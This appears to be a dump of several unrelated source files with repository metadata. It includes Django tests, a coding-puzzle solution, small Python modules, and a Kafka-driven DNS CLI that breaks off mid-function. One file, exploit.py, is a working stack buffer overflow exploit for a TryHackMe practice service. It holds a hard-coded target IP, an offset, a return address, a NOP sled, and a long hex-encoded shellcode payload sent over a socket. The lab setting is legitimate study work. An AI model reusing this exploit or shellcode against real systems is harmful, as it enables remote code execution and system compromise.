2022-02-18T19:27:21.000Z
|
DeepChecker/__init__.py
|
umitylmz/DeepChecker
|
99bf6e133890aa44711536723ad9acf16314830d
|
[
"MIT"
] | null | null | null |
DeepChecker/__init__.py
|
umitylmz/DeepChecker
|
99bf6e133890aa44711536723ad9acf16314830d
|
[
"MIT"
] | 6
|
2020-08-05T14:17:12.000Z
|
2022-03-03T05:52:28.000Z
|
from DeepChecker.Checkers import *
| 17.5
| 34
| 0.828571
| 4
| 35
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
664f4b3b2027544507e9b37e6ef7413af737a3d5
| 231
|
py
|
Python
|
1101-1200/1163-Distribute Candies/1163-Distribute Candies.py
|
jiadaizhao/LintCode
|
a8aecc65c47a944e9debad1971a7bc6b8776e48b
|
[
"MIT"
] | 77
|
2017-12-30T13:33:37.000Z
|
2022-01-16T23:47:08.000Z
|
1101-1200/1163-Distribute Candies/1163-Distribute Candies.py
|
jxhangithub/LintCode-1
|
a8aecc65c47a944e9debad1971a7bc6b8776e48b
|
[
"MIT"
] | 1
|
2018-05-14T14:15:40.000Z
|
2018-05-14T14:15:40.000Z
|
1101-1200/1163-Distribute Candies/1163-Distribute Candies.py
|
jxhangithub/LintCode-1
|
a8aecc65c47a944e9debad1971a7bc6b8776e48b
|
[
"MIT"
] | 39
|
2017-12-07T14:36:25.000Z
|
2022-03-10T23:05:37.000Z
|
class Solution:
"""
@param candies: a list of integers
@return: return a integer
"""
def distributeCandies(self, candies):
# write your code here
return min(len(set(candies)), len(candies) // 2)
| 25.666667
| 56
| 0.61039
| 28
| 231
| 5.035714
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005952
| 0.272727
| 231
| 8
| 57
| 28.875
| 0.833333
| 0.354978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
66542479cdedfadc3cc79ca36adbd5a5951278b3
| 43
|
py
|
Python
|
tests/test_MBS/__init__.py
|
bigdata-ustc/EduSim
|
849eed229c24615e5f2c3045036311e83c22ea68
|
[
"MIT"
] | 18
|
2019-11-11T03:45:35.000Z
|
2022-02-09T15:31:51.000Z
|
tests/test_MBS/__init__.py
|
ghzhao78506/EduSim
|
cb10e952eb212d8a9344143f889207b5cd48ba9d
|
[
"MIT"
] | 3
|
2020-10-23T01:05:57.000Z
|
2021-03-16T12:12:24.000Z
|
tests/test_MBS/__init__.py
|
bigdata-ustc/EduSim
|
849eed229c24615e5f2c3045036311e83c22ea68
|
[
"MIT"
] | 6
|
2020-06-09T21:32:00.000Z
|
2022-03-12T00:25:18.000Z
|
# coding: utf-8
# 2021/03/12 @ zhaoguanhao
| 14.333333
| 26
| 0.674419
| 7
| 43
| 4.142857
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.162791
| 43
| 2
| 27
| 21.5
| 0.555556
| 0.883721
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b08a93c2485c9207b162b22abf4d7cb7a8947024
| 173
|
py
|
Python
|
bitwise/logic/__init__.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
bitwise/logic/__init__.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
bitwise/logic/__init__.py
|
jamesjiang52/Bitwise
|
c71f151d23034b3f9e2a939f637be0eaa16c45c3
|
[
"MIT"
] | null | null | null |
from .AND import *
from .COMP import *
from .NAND import *
from .NOR import *
from .NOT import *
from .OR import *
from .PAR import *
from .XNOR import *
from .XOR import *
| 17.3
| 19
| 0.687861
| 27
| 173
| 4.407407
| 0.407407
| 0.672269
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208092
| 173
| 9
| 20
| 19.222222
| 0.868613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c0a7ee8a1d12afb4a736f3531f18c61cfd4058f
| 100
|
py
|
Python
|
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | 1
|
2021-03-11T22:18:56.000Z
|
2021-03-11T22:18:56.000Z
|
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | null | null | null |
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | null | null | null |
def is_success(code):
return code == 'ok'
def is_error_code(code):
return code == 'ERROR'
| 14.285714
| 26
| 0.64
| 15
| 100
| 4.066667
| 0.466667
| 0.163934
| 0.459016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22
| 100
| 6
| 27
| 16.666667
| 0.782051
| 0
| 0
| 0
| 0
| 0
| 0.07
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b0433121aa8bbd1327d3221055a476dfcaf07db3
| 136
|
py
|
Python
|
case3/test_calc.py
|
emre/unit-test-workshop
|
6a323dd7ffac08e7aa56e09d307798d4ae984fa9
|
[
"MIT"
] | 1
|
2017-11-20T18:15:12.000Z
|
2017-11-20T18:15:12.000Z
|
case3/test_calc.py
|
emre/unit-test-workshop
|
6a323dd7ffac08e7aa56e09d307798d4ae984fa9
|
[
"MIT"
] | null | null | null |
case3/test_calc.py
|
emre/unit-test-workshop
|
6a323dd7ffac08e7aa56e09d307798d4ae984fa9
|
[
"MIT"
] | null | null | null |
import unittest
# https://docs.python.org/3/library/unittest.html
from calc import Calc
class TestCalc(unittest.TestCase):
pass
| 13.6
| 49
| 0.757353
| 19
| 136
| 5.421053
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.139706
| 136
| 9
| 50
| 15.111111
| 0.871795
| 0.345588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
c68a6d8f407663035b0e8aaa5e7a9d1c6021d7ca
| 11,082
|
py
|
Python
|
app/tests/evaluation_tests/test_views.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
app/tests/evaluation_tests/test_views.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
app/tests/evaluation_tests/test_views.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
from collections import namedtuple
from datetime import timedelta
import factory
import pytest
from django.db.models import signals
from django.utils import timezone
from tests.factories import (
EvaluationFactory,
MethodFactory,
SubmissionFactory,
)
from tests.utils import (
get_view_for_user,
validate_admin_only_view,
validate_admin_or_participant_view,
validate_open_view,
)
def submission_and_evaluation(*, challenge, creator):
"""Creates a submission and an evaluation for that submission."""
s = SubmissionFactory(challenge=challenge, creator=creator)
e = EvaluationFactory(submission=s)
return s, e
def submissions_and_evaluations(two_challenge_sets):
"""
Create (e)valuations and (s)ubmissions for each (p)articipant and
(c)hallenge.
"""
SubmissionsAndEvaluations = namedtuple(
"SubmissionsAndEvaluations",
[
"p_s1",
"p_s2",
"p1_s1",
"p12_s1_c1",
"p12_s1_c2",
"e_p_s1",
"e_p_s2",
"e_p1_s1",
"e_p12_s1_c1",
"e_p12_s1_c2",
],
)
# participant 0, submission 1, challenge 1, etc
p_s1, e_p_s1 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
p_s2, e_p_s2 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
p1_s1, e_p1_s1 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant1,
)
# participant12, submission 1 to each challenge
p12_s1_c1, e_p12_s1_c1 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.participant12,
)
p12_s1_c2, e_p12_s1_c2 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_2.challenge,
creator=two_challenge_sets.participant12,
)
return SubmissionsAndEvaluations(
p_s1,
p_s2,
p1_s1,
p12_s1_c1,
p12_s1_c2,
e_p_s1,
e_p_s2,
e_p1_s1,
e_p12_s1_c1,
e_p12_s1_c2,
)
@pytest.mark.django_db
def test_method_list(client, two_challenge_sets):
validate_admin_only_view(
viewname="evaluation:method-list",
two_challenge_set=two_challenge_sets,
client=client,
)
@pytest.mark.django_db
def test_method_create(client, two_challenge_sets):
validate_admin_only_view(
viewname="evaluation:method-create",
two_challenge_set=two_challenge_sets,
client=client,
)
@pytest.mark.django_db
def test_method_detail(client, two_challenge_sets):
method = MethodFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.admin,
)
validate_admin_only_view(
viewname="evaluation:method-detail",
two_challenge_set=two_challenge_sets,
reverse_kwargs={"pk": method.pk},
client=client,
)
@pytest.mark.django_db
@factory.django.mute_signals(signals.post_save)
def test_submission_list(client, two_challenge_sets):
validate_admin_or_participant_view(
viewname="evaluation:submission-list",
two_challenge_set=two_challenge_sets,
client=client,
)
p_s1, p_s2, p1_s1, p12_s1_c1, p12_s1_c2, *_ = submissions_and_evaluations(
two_challenge_sets
)
# Participants should only be able to see their own submissions
response = get_view_for_user(
viewname="evaluation:submission-list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.participant,
)
assert str(p_s1.pk) in response.rendered_content
assert str(p_s2.pk) in response.rendered_content
assert str(p1_s1.pk) not in response.rendered_content
assert str(p12_s1_c1.pk) not in response.rendered_content
assert str(p12_s1_c2.pk) not in response.rendered_content
# Admins should be able to see all submissions
response = get_view_for_user(
viewname="evaluation:submission-list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.admin,
)
assert str(p_s1.pk) in response.rendered_content
assert str(p_s2.pk) in response.rendered_content
assert str(p1_s1.pk) in response.rendered_content
assert str(p12_s1_c1.pk) in response.rendered_content
assert str(p12_s1_c2.pk) not in response.rendered_content
# Only submissions relevant to this challenge should be listed
response = get_view_for_user(
viewname="evaluation:submission-list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.participant12,
)
assert str(p12_s1_c1.pk) in response.rendered_content
assert str(p12_s1_c2.pk) not in response.rendered_content
assert str(p_s1.pk) not in response.rendered_content
assert str(p_s2.pk) not in response.rendered_content
assert str(p1_s1.pk) not in response.rendered_content
@pytest.mark.django_db
def test_submission_create(client, two_challenge_sets):
validate_admin_or_participant_view(
viewname="evaluation:submission-create",
two_challenge_set=two_challenge_sets,
client=client,
)
response = get_view_for_user(
viewname="evaluation:submission-create",
challenge=two_challenge_sets.challenge_set_1.challenge,
user=two_challenge_sets.challenge_set_1.participant,
client=client,
)
assert response.status_code == 200
assert "Creator" not in response.rendered_content
@pytest.mark.django_db
def test_legacy_submission_create(client, two_challenge_sets):
validate_admin_only_view(
viewname="evaluation:submission-create-legacy",
two_challenge_set=two_challenge_sets,
client=client,
)
response = get_view_for_user(
viewname="evaluation:submission-create-legacy",
challenge=two_challenge_sets.challenge_set_1.challenge,
user=two_challenge_sets.admin12,
client=client,
)
assert response.status_code == 200
assert "Creator" in response.rendered_content
@pytest.mark.django_db
def test_submission_time_limit(client, two_challenge_sets):
SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
def get_submission_view():
return get_view_for_user(
viewname="evaluation:submission-create",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.participant,
)
assert "make 9 more" in get_submission_view().rendered_content
s = SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
s.created = timezone.now() - timedelta(hours=23)
s.save()
assert "make 8 more" in get_submission_view().rendered_content
s = SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
s.created = timezone.now() - timedelta(hours=25)
s.save()
assert "make 8 more" in get_submission_view().rendered_content
@pytest.mark.django_db
def test_submission_detail(client, two_challenge_sets):
submission = SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
validate_admin_only_view(
viewname="evaluation:submission-detail",
two_challenge_set=two_challenge_sets,
reverse_kwargs={"pk": submission.pk},
client=client,
)
@pytest.mark.django_db
@factory.django.mute_signals(signals.post_save)
def test_evaluation_list(client, two_challenge_sets):
validate_admin_or_participant_view(
viewname="evaluation:list",
two_challenge_set=two_challenge_sets,
client=client,
)
(
*_,
e_p_s1,
e_p_s2,
e_p1_s1,
e_p12_s1_c1,
e_p12_s1_c2,
) = submissions_and_evaluations(two_challenge_sets)
# Participants should only be able to see their own evaluations
response = get_view_for_user(
viewname="evaluation:list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.participant,
)
assert str(e_p_s1.pk) in response.rendered_content
assert str(e_p_s2.pk) in response.rendered_content
assert str(e_p1_s1.pk) not in response.rendered_content
assert str(e_p12_s1_c1.pk) not in response.rendered_content
assert str(e_p12_s1_c2.pk) not in response.rendered_content
# Admins should be able to see all evaluations
response = get_view_for_user(
viewname="evaluation:list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.admin,
)
assert str(e_p_s1.pk) in response.rendered_content
assert str(e_p_s2.pk) in response.rendered_content
assert str(e_p1_s1.pk) in response.rendered_content
assert str(e_p12_s1_c1.pk) in response.rendered_content
assert str(e_p12_s1_c2.pk) not in response.rendered_content
# Only evaluations relevant to this challenge should be listed
response = get_view_for_user(
viewname="evaluation:list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.participant12,
)
assert str(e_p12_s1_c1.pk) in response.rendered_content
assert str(e_p12_s1_c2.pk) not in response.rendered_content
assert str(e_p_s1.pk) not in response.rendered_content
assert str(e_p_s2.pk) not in response.rendered_content
assert str(e_p1_s1.pk) not in response.rendered_content
@pytest.mark.django_db
def test_leaderboard(client, eval_challenge_set):
validate_open_view(
viewname="evaluation:leaderboard",
challenge_set=eval_challenge_set.challenge_set,
client=client,
)
# TODO: test that private results cannot be seen
@pytest.mark.django_db
def test_evaluation_detail(client, eval_challenge_set):
submission = SubmissionFactory(
challenge=eval_challenge_set.challenge_set.challenge,
creator=eval_challenge_set.challenge_set.participant,
)
e = EvaluationFactory(submission=submission)
validate_open_view(
viewname="evaluation:detail",
challenge_set=eval_challenge_set.challenge_set,
reverse_kwargs={"pk": e.pk},
client=client,
)
| 33.889908
| 78
| 0.721891
| 1,447
| 11,082
| 5.16586
| 0.085695
| 0.105953
| 0.124147
| 0.110368
| 0.849097
| 0.818595
| 0.800268
| 0.770301
| 0.76495
| 0.723612
| 0
| 0.026122
| 0.202039
| 11,082
| 326
| 79
| 33.993865
| 0.819179
| 0.055405
| 0
| 0.535971
| 0
| 0
| 0.057978
| 0.03862
| 0
| 0
| 0
| 0.003067
| 0.133094
| 1
| 0.05036
| false
| 0
| 0.028777
| 0.003597
| 0.089928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c691c92322330bef3cb93860c43c284649dcb60d
| 120
|
py
|
Python
|
cronicl/tracers/__init__.py
|
joocer/cronicl
|
5ab215554939699683752cb7b8549756edff9ea5
|
[
"Apache-2.0"
] | null | null | null |
cronicl/tracers/__init__.py
|
joocer/cronicl
|
5ab215554939699683752cb7b8549756edff9ea5
|
[
"Apache-2.0"
] | 73
|
2020-10-05T21:00:48.000Z
|
2020-11-16T23:29:41.000Z
|
cronicl/tracers/__init__.py
|
joocer/cronicl
|
5ab215554939699683752cb7b8549756edff9ea5
|
[
"Apache-2.0"
] | null | null | null |
from .file_tracer import FileTracer
from .null_tracer import NullTracer
from .base_tracer import BaseTracer, get_tracer
| 30
| 47
| 0.858333
| 17
| 120
| 5.823529
| 0.588235
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108333
| 120
| 3
| 48
| 40
| 0.925234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c6cc6e291c2d423fccb4a28cc69ba02ced719b37
| 186
|
py
|
Python
|
Python_Files/murach/solutions/ch14/movies/objects.py
|
Interloper2448/BCGPortfolio
|
c4c160a835c64c8d099d44c0995197f806ccc824
|
[
"MIT"
] | null | null | null |
Python_Files/murach/solutions/ch14/movies/objects.py
|
Interloper2448/BCGPortfolio
|
c4c160a835c64c8d099d44c0995197f806ccc824
|
[
"MIT"
] | null | null | null |
Python_Files/murach/solutions/ch14/movies/objects.py
|
Interloper2448/BCGPortfolio
|
c4c160a835c64c8d099d44c0995197f806ccc824
|
[
"MIT"
] | null | null | null |
class Movie:
def __init__(self, name="", year=1901):
self.name = name
self.year = year
def getStr(self):
return self.name + " (" + str(self.year) + ")"
| 23.25
| 55
| 0.532258
| 23
| 186
| 4.130435
| 0.478261
| 0.252632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031008
| 0.306452
| 186
| 7
| 56
| 26.571429
| 0.705426
| 0
| 0
| 0
| 0
| 0
| 0.016129
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
05e70bf4fcafed340bac69f51837c437a43b38d8
| 93
|
py
|
Python
|
utensor_cgen/backend/utensor/code_generator/__init__.py
|
uTensor/utensor_cgen
|
eccd6859028d0b6a350dced25ea72ff02faaf9ad
|
[
"Apache-2.0"
] | 49
|
2018-01-06T12:57:56.000Z
|
2021-09-03T09:48:32.000Z
|
utensor_cgen/backend/utensor/code_generator/__init__.py
|
uTensor/utensor_cgen
|
eccd6859028d0b6a350dced25ea72ff02faaf9ad
|
[
"Apache-2.0"
] | 101
|
2018-01-16T19:24:21.000Z
|
2021-11-10T19:39:33.000Z
|
utensor_cgen/backend/utensor/code_generator/__init__.py
|
uTensor/utensor_cgen
|
eccd6859028d0b6a350dced25ea72ff02faaf9ad
|
[
"Apache-2.0"
] | 32
|
2018-02-15T19:39:50.000Z
|
2020-11-26T22:32:05.000Z
|
from .legacy import uTensorLegacyCodeGenerator
from .rearch import uTensorRearchCodeGenerator
| 46.5
| 46
| 0.903226
| 8
| 93
| 10.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075269
| 93
| 2
| 47
| 46.5
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
af19bd3d785d56642d7b3f0a837d7edbf7bf7261
| 1,975
|
py
|
Python
|
Stack-Based-BOF/THM-BOF-1/exploit.py
|
Rob-VanDusen/ctf-notes
|
c88dc7597bca1bcda88d5ef07f38dcb50b89be59
|
[
"CC0-1.0"
] | null | null | null |
Stack-Based-BOF/THM-BOF-1/exploit.py
|
Rob-VanDusen/ctf-notes
|
c88dc7597bca1bcda88d5ef07f38dcb50b89be59
|
[
"CC0-1.0"
] | null | null | null |
Stack-Based-BOF/THM-BOF-1/exploit.py
|
Rob-VanDusen/ctf-notes
|
c88dc7597bca1bcda88d5ef07f38dcb50b89be59
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
import socket
ip = "10.10.16.223"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62" # 625011AF
padding = "\x90" * 16
payload = ("\xbe\x13\xbf\x94\xb6\xdb\xd7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x70\x0e\x03\x63\xb1\x76\x43\x7f\x25\xf4"
"\xac\x7f\xb6\x99\x25\x9a\x87\x99\x52\xef\xb8\x29\x10\xbd\x34"
"\xc1\x74\x55\xce\xa7\x50\x5a\x67\x0d\x87\x55\x78\x3e\xfb\xf4"
"\xfa\x3d\x28\xd6\xc3\x8d\x3d\x17\x03\xf3\xcc\x45\xdc\x7f\x62"
"\x79\x69\x35\xbf\xf2\x21\xdb\xc7\xe7\xf2\xda\xe6\xb6\x89\x84"
"\x28\x39\x5d\xbd\x60\x21\x82\xf8\x3b\xda\x70\x76\xba\x0a\x49"
"\x77\x11\x73\x65\x8a\x6b\xb4\x42\x75\x1e\xcc\xb0\x08\x19\x0b"
"\xca\xd6\xac\x8f\x6c\x9c\x17\x6b\x8c\x71\xc1\xf8\x82\x3e\x85"
"\xa6\x86\xc1\x4a\xdd\xb3\x4a\x6d\x31\x32\x08\x4a\x95\x1e\xca"
"\xf3\x8c\xfa\xbd\x0c\xce\xa4\x62\xa9\x85\x49\x76\xc0\xc4\x05"
"\xbb\xe9\xf6\xd5\xd3\x7a\x85\xe7\x7c\xd1\x01\x44\xf4\xff\xd6"
"\xab\x2f\x47\x48\x52\xd0\xb8\x41\x91\x84\xe8\xf9\x30\xa5\x62"
"\xf9\xbd\x70\x24\xa9\x11\x2b\x85\x19\xd2\x9b\x6d\x73\xdd\xc4"
"\x8e\x7c\x37\x6d\x24\x87\xd0\x98\xbd\xaf\xf8\xf5\xbf\xaf\xe9"
"\x59\x49\x49\x63\x72\x1f\xc2\x1c\xeb\x3a\x98\xbd\xf4\x90\xe5"
"\xfe\x7f\x17\x1a\xb0\x77\x52\x08\x25\x78\x29\x72\xe0\x87\x87"
"\x1a\x6e\x15\x4c\xda\xf9\x06\xdb\x8d\xae\xf9\x12\x5b\x43\xa3"
"\x8c\x79\x9e\x35\xf6\x39\x45\x86\xf9\xc0\x08\xb2\xdd\xd2\xd4"
"\x3b\x5a\x86\x88\x6d\x34\x70\x6f\xc4\xf6\x2a\x39\xbb\x50\xba"
"\xbc\xf7\x62\xbc\xc0\xdd\x14\x20\x70\x88\x60\x5f\xbd\x5c\x65"
"\x18\xa3\xfc\x8a\xf3\x67\x1c\x69\xd1\x9d\xb5\x34\xb0\x1f\xd8"
"\xc6\x6f\x63\xe5\x44\x85\x1c\x12\x54\xec\x19\x5e\xd2\x1d\x50"
"\xcf\xb7\x21\xc7\xf0\x9d")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
| 39.5
| 73
| 0.696709
| 422
| 1,975
| 3.255924
| 0.549763
| 0.008734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.257235
| 0.05519
| 1,975
| 49
| 74
| 40.306122
| 0.4791
| 0.01519
| 0
| 0
| 0
| 0.547619
| 0.773546
| 0.722594
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02381
| 0
| 0.02381
| 0.071429
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
af6f367d7cdaed06d634c9db91b020afc6d934e8
| 3,197
|
py
|
Python
|
domba/clis/start.py
|
sofyan48/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | 1
|
2019-07-27T12:17:16.000Z
|
2019-07-27T12:17:16.000Z
|
domba/clis/start.py
|
meongbego/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | null | null | null |
domba/clis/start.py
|
meongbego/domba
|
fbd891ce69325d56774114eb6ef71c8d0f5ab428
|
[
"MIT"
] | null | null | null |
from domba.clis.base import Base
from domba.libs import env_lib
from domba.libs import knot_lib
from domba.libs import kafka_lib
import os
class Start(Base):
"""
usage:
start slave
start master
Command :
Options:
-h --help Print usage
"""
def execute(self):
# knot_lib.utils.check_root()
broker_env = env_lib.utils.get_env_values_broker()
broker = broker_env['broker']+":"+broker_env['port']
topic = broker_env['topic']
group = broker_env['group']
flag = broker_env['flags']
if self.args['slave']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
if self.args['master']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
